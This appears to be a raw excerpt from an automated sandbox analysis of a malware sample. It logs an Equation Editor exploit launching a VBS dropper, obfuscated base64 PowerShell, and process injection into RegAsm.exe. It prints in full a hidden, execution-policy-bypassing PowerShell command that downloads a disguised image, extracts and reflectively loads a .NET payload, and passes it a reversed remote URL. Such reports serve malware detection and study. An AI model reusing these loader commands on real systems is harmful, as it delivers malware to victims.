                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434BD8 SetUnhandledExceptionFilter,9_2_00434BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0043503C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043BB71

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Bypasses PowerShell execution policy
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Injects a PE file into a foreign processes
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_00412132
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419662 mouse_event,9_2_00419662
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?d
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.tsonu/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? 